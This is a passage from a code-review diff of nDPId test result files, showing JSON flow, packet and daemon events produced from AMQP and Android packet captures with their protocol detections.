00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":160,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":108,"flow_first_seen":1490904166118,"flow_last_seen":1490904170243,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":7295,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1490904170243,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44205,"dst_port":5672,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}}
00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":160,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1490904169152,"flow_last_seen":1490904170195,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":2085,"flow_avg_l4_payload_len":69,"midstream":1,"thread_ts_msec":1490904170243,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44206,"dst_port":5672,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}}
00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490904166118,"flow_last_seen":1490904166118,"flow_idle_time":7560000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1490904166118,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44205,"dst_port":5672,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1490904166118,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1490904166118,"pkt":"AAAAAAAAAAAAAAAACABFAABdxi1AAEAGdWt\/AAABfwABAaytFihPdGXjNxAmEoAYAV7\/UQAAAQEICgC+1cIAvtPNAQABAAAAIQA8ACgAAAhjZWxlcnlldhB3b3JrZXIuaGVhcnRiZWF0AM4="}
00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490904166118,"flow_last_seen":1490904166118,"flow_idle_time":7560000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1490904166118,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44205,"dst_port":5672,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}}
00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1490904166118,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490904166118,"pkt":"AAAAAAAAAAAAAAAACABFAAA0puJAAEAGlN9\/AAEBfwAAARYorK03ECYST3RmDIAQSfD\/KAAAAQEICgC+1cIAvtXC"}
00595{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1490904166119,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":162,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":162,"pkt_l4_len":128,"thread_ts_msec":1490904166119,"pkt":"AAAAAAAAAAAAAAAACABFAACUxi5AAEAGdTN\/AAABfwABAaytFihPdGYMNxAmEoAYAV7\/iAAAAQEICgC+1cIAvtXCAgABAAAAWAA8AAAAAAAAAAABJ\/gAEGFwcGxpY2F0aW9uL2pzb24FdXRmLTgAAAAtCGhvc3RuYW1lUwAAAB9jZWxlcnlAdGVzdC5jb2duaXRvbmV0d29ya3MuY29tAgDO"}
00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"amqp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490904166119,"flow_last_seen":1490904166119,"flow_idle_time":7560000,"flow_min_l4_payload_len":448,"flow_max_l4_payload_len":448,"flow_tot_l4_payload_len":448,"flow_avg_l4_payload_len":448,"midstream":1,"thread_ts_msec":1490904166119,"l3_proto":"ip4","src_ip":"127.0.1.1","dst_ip":"127.0.0.1","src_port":5672,"dst_port":44204,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
01065{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"amqp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1490904166119,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":514,"pkt_l4_len":480,"thread_ts_msec":1490904166119,"pkt":"AAAAAAAAAAAAAAAACABFAAH0AQRAAEAGOP5\/AAEBfwAAARYorKyekqFfoHNnjIAYAXcA6QAAAQEICgC+1cIAvtPXAQADAAAAKQA8ADwBMwAAAAAAAGF2AAhjZWxlcnlldhB3b3JrZXIuaGVhcnRiZWF0zgIAAwAAAFgAPAAAAAAAAAAAASf4ABBhcHBsaWNhdGlvbi9qc29uBXV0Zi04AAAALQhob3N0bmFtZVMAAAAfY2VsZXJ5QHRlc3QuY29nbml0b25ldHdvcmtzLmNvbQIAzgMAAwAAASd7InN3X3N5cyI6ICJMaW51eCIsICJjbG9jayI6IDM5MTcyNSwgInRpbWVzdGFtcCI6IDE0OTA5MDQxNjYuMTE4NTgzLCAiaG9zdG5hbWUiOiAiY2VsZXJ5QHRlc3QuY29nbml0b25ldHdvcmtzLmNvbSIsICJwaWQiOiAxODk0LCAic3dfdmVyIjogIjMuMS4xOCIsICJ1dGNvZmZzZXQiOiAwLCAibG9hZGF2ZyI6IFswLjc4LCAwLjU2LCAwLjQyXSwgInByb2Nlc3NlZCI6IDExMzk0MiwgImFjdGl2ZSI6IDAsICJmcmVxIjogMi4wLCAidHlwZSI6ICJ3b3JrZXItaGVhcnRiZWF0IiwgInN3X2lkZW50IjogInB5LWNlbGVyeSJ9zg=="}
00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"amqp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1490904166119,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490904166119,"pkt":"AAAAAAAAAAAAAAAACABFAAA0HMNAAEAGHv9\/AAABfwABAaysFiigc2eMnpKjH4AQDjX\/KAAAAQEICgC+1cIAvtXC"}
01066{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"amqp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1490904168121,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":514,"pkt_l4_len":480,"thread_ts_msec":1490904168121,"pkt":"AAAAAAAAAAAAAAAACABFAAH0AQVAAEAGOP1\/AAEBfwAAARYorKyekqMfoHNnjIAYAXcA6QAAAQEICgC+17YAvtXCAQADAAAAKQA8ADwBMwAAAAAAAGF3AAhjZWxlcnlldhB3b3JrZXIuaGVhcnRiZWF0zgIAAwAAAFgAPAAAAAAAAAAAASf4ABBhcHBsaWNhdGlvbi9qc29uBXV0Zi04AAAALQhob3N0bmFtZVMAAAAfY2VsZXJ5QHRlc3QuY29nbml0b25ldHdvcmtzLmNvbQIAzgMAAwAAASd7InN3X3N5cyI6ICJMaW51eCIsICJjbG9jayI6IDM5MTcyNywgInRpbWVzdGFtcCI6IDE0OTA5MDQxNjguMTIwNTc2LCAiaG9zdG5hbWUiOiAiY2VsZXJ5QHRlc3QuY29nbml0b25ldHdvcmtzLmNvbSIsICJwaWQiOiAxODk0LCAic3dfdmVyIjogIjMuMS4xOCIsICJ1dGNvZmZzZXQiOiAwLCAibG9hZGF2ZyI6IFswLjc4LCAwLjU2LCAwLjQyXSwgInByb2Nlc3NlZCI6IDExMzk0MiwgImFjdGl2ZSI6IDAsICJmcmVxIjogMi4wLCAidHlwZSI6ICJ3b3JrZXItaGVhcnRiZWF0IiwgInN3X2lkZW50IjogInB5LWNlbGVyeSJ9zg=="}
00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490904169152,"flow_last_seen":1490904169152,"flow_idle_time":7560000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1490904169152,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44206,"dst_port":5672,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1490904169152,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1490904169152,"pkt":"AAAAAAAAAAAAAAAACABFAABTPztAAEAG\/Gd\/AAABfwABAayuFiiKm04N2t+K4IAYAV7\/RwAAAQEICgC+2LgAvtO2AQABAAAAFwA8ACgAAAdkZWZhdWx0B3Rhc2tzLiMAzg=="}
00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490904169152,"flow_last_seen":1490904169152,"flow_idle_time":7560000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1490904169152,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44206,"dst_port":5672,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1490904169152,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490904169152,"pkt":"AAAAAAAAAAAAAAAACABFAAA01sFAAEAGZQB\/AAEBfwAAARYorK7a34rgiptOLIAQDAj\/KAAAAQEICgC+2LgAvti4"}
00656{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1490904169152,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1490904169152,"pkt":"AAAAAAAAAAAAAAAACABFAADAPzxAAEAG+\/l\/AAABfwABAayuFiiKm04s2t+K4IAYAV7\/tAAAAQEICgC+2LgAvti4AgABAAAAhAA8AAAAAAAAAAAA7v4AHmFwcGxpY2F0aW9uL3gtcHl0aG9uLXNlcmlhbGl6ZQZiaW5hcnkAAAAAAgAkZjMzYWFlMjctNjlmNC00ZjQ4LWIwYmMtMmVmZGM0NTVjMTI4JGFiZjI3YmI1LTAxNDktM2RiZC1hMmRiLWQzNTcyYzMwOTc5MM4="}
00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"amqp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490904166119,"flow_last_seen":1490904169156,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":448,"flow_tot_l4_payload_len":1342,"flow_avg_l4_payload_len":191,"midstream":1,"thread_ts_msec":1490904169156,"l3_proto":"ip4","src_ip":"127.0.1.1","dst_ip":"127.0.0.1","src_port":5672,"dst_port":44204,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}}
00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":160,"source":"amqp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1490904166119,"flow_last_seen":1490904170242,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":448,"flow_tot_l4_payload_len":3574,"flow_avg_l4_payload_len":162,"midstream":1,"thread_ts_msec":1490904170243,"l3_proto":"ip4","src_ip":"127.0.1.1","dst_ip":"127.0.0.1","src_port":5672,"dst_port":44204,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}}
00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":160,"source":"amqp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":108,"flow_first_seen":1490904166118,"flow_last_seen":1490904170243,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":7295,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1490904170243,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44205,"dst_port":5672,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}}
00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":160,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1490904169152,"flow_last_seen":1490904170195,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":2085,"flow_avg_l4_payload_len":69,"midstream":1,"thread_ts_msec":1490904170243,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44206,"dst_port":5672,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}}
00554{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":160,"source":"amqp.pcap","alias":"nDPId-test","packets-captured":160,"packets-processed":160,"total-skipped-flows":0,"total-l4-data-len":12954,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":21,"global_ts_msec":1490904170243}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 160/160

368
test/results/android.pcap.out
View File

@@ -1,23 +1,23 @@
00458{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"android.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"android.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1582454769772}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"android.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454769772,"flow_last_seen":1582454769772,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":1,"thread_ts_msec":1582454769772,"l3_proto":"ip4","src_ip":"95.101.24.53","dst_ip":"192.168.2.17","src_port":443,"dst_port":50677,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"android.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1582454769772,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1582454769772,"pkt":"xGGLNYKpxiwDYGpkCABFAABMMy4AADUGGCtfZRg1wKgCEQG7xfVNnd4qbhnKg4AYAUXNDgAAAQEICmx+XigR4ZkoFwMDABMwxZA0Xbk6ucnG2OFNZYAG8R1y"}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"android.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454779631,"flow_last_seen":1582454779631,"flow_idle_time":7440000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":1,"thread_ts_msec":1582454779631,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50584,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00530{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"android.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1582454779631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":112,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":112,"pkt_l4_len":78,"thread_ts_msec":1582454779631,"pkt":"xGGLNYKpxiwDYGpkCABFAgBirQcAAC4GWpAR+LBLwKgCEQG7xZj0WotEsqX09IAYBCokkgAAAQEIClsVyooR3+x3FwMDACkAAAAAAAAABGgk1MfD1SR1H5v5Q6dSq6XAgQAjDJnQ9jro2uiXnku8Hg=="}
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"android.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1582454779631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1582454779631,"pkt":"xGGLNYKpxiwDYGpkCABFAgBTrQgAAC4GWp4R+LBLwKgCEQG7xZj0WotysqX09IAZBCpyhAAAAQEIClsVyooR3+x3FQMDABoAAAAAAAAABZSZBhugqn7IvMs7ScmDJ6yQxA=="}
00571{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"android.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1582454779931,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":143,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":143,"pkt_l4_len":109,"thread_ts_msec":1582454779931,"pkt":"xGGLNYKpxiwDYGpkCABFAACBrQkAAC4GWnER+LBLwKgCEQG7xZj0WotEsqX09IAZBCq7DgAAAQEIClsVy7YR3+x3FwMDACkAAAAAAAAABGgk1MfD1SR1H5v5Q6dSq6XAgQAjDJnQ9jro2uiXnku8HhUDAwAaAAAAAAAAAAWUmQYboKp+yLzLO0nJgyeskMQ="}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"android.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454780612,"flow_last_seen":1582454780612,"flow_idle_time":7440000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":1,"thread_ts_msec":1582454780612,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"android.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1582454780612,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":112,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":112,"pkt_l4_len":78,"thread_ts_msec":1582454780612,"pkt":"xGGLNYKpxiwDYGpkCABFAgBiArsAAC4GBN0R+LBLwKgCEQG7xZQAd+\/fhij6wYAYBTCNMgAAAQEIClsVzl8R3+\/bFwMDACkAAAAAAAAACH\/oI1Kw++l3rtTYoEdnoXbMNGznM5xRQS6qcOaP89cv8Q=="}
00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"android.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1582454780612,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1582454780612,"pkt":"xGGLNYKpxiwDYGpkCABFAgBTArwAAC4GBOsR+LBLwKgCEQG7xZQAd\/ANhij6wYAZBTCw2QAAAQEIClsVzl8R3+\/bFQMDABoAAAAAAAAACeuqoxCRLc0dnl7lMGJ\/SkF\/RQ=="}
00574{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"android.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1582454780907,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":143,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":143,"pkt_l4_len":109,"thread_ts_msec":1582454780907,"pkt":"xGGLNYKpxiwDYGpkCABFAACBAr0AAC4GBL4R+LBLwKgCEQG7xZQAd+\/fhij6wYAZBTC0SwAAAQEIClsVz4YR3+\/bFwMDACkAAAAAAAAACH\/oI1Kw++l3rtTYoEdnoXbMNGznM5xRQS6qcOaP89cv8RUDAwAaAAAAAAAAAAnrqqMQkS3NHZ5e5TBif0pBf0U="}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"android.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454769772,"flow_last_seen":1582454769772,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":1,"thread_ts_msec":1582454769772,"l3_proto":"ip4","src_ip":"95.101.24.53","dst_ip":"192.168.2.17","src_port":443,"dst_port":50677,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"android.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1582454769772,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1582454769772,"pkt":"xGGLNYKpxiwDYGpkCABFAABMMy4AADUGGCtfZRg1wKgCEQG7xfVNnd4qbhnKg4AYAUXNDgAAAQEICmx+XigR4ZkoFwMDABMwxZA0Xbk6ucnG2OFNZYAG8R1y"}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"android.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454779631,"flow_last_seen":1582454779631,"flow_idle_time":7560000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":1,"thread_ts_msec":1582454779631,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50584,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00530{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"android.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1582454779631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":112,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":112,"pkt_l4_len":78,"thread_ts_msec":1582454779631,"pkt":"xGGLNYKpxiwDYGpkCABFAgBirQcAAC4GWpAR+LBLwKgCEQG7xZj0WotEsqX09IAYBCokkgAAAQEIClsVyooR3+x3FwMDACkAAAAAAAAABGgk1MfD1SR1H5v5Q6dSq6XAgQAjDJnQ9jro2uiXnku8Hg=="}
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"android.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1582454779631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1582454779631,"pkt":"xGGLNYKpxiwDYGpkCABFAgBTrQgAAC4GWp4R+LBLwKgCEQG7xZj0WotysqX09IAZBCpyhAAAAQEIClsVyooR3+x3FQMDABoAAAAAAAAABZSZBhugqn7IvMs7ScmDJ6yQxA=="}
00571{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"android.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1582454779931,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":143,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":143,"pkt_l4_len":109,"thread_ts_msec":1582454779931,"pkt":"xGGLNYKpxiwDYGpkCABFAACBrQkAAC4GWnER+LBLwKgCEQG7xZj0WotEsqX09IAZBCq7DgAAAQEIClsVy7YR3+x3FwMDACkAAAAAAAAABGgk1MfD1SR1H5v5Q6dSq6XAgQAjDJnQ9jro2uiXnku8HhUDAwAaAAAAAAAAAAWUmQYboKp+yLzLO0nJgyeskMQ="}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"android.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454780612,"flow_last_seen":1582454780612,"flow_idle_time":7560000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":1,"thread_ts_msec":1582454780612,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"android.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1582454780612,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":112,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":112,"pkt_l4_len":78,"thread_ts_msec":1582454780612,"pkt":"xGGLNYKpxiwDYGpkCABFAgBiArsAAC4GBN0R+LBLwKgCEQG7xZQAd+\/fhij6wYAYBTCNMgAAAQEIClsVzl8R3+\/bFwMDACkAAAAAAAAACH\/oI1Kw++l3rtTYoEdnoXbMNGznM5xRQS6qcOaP89cv8Q=="}
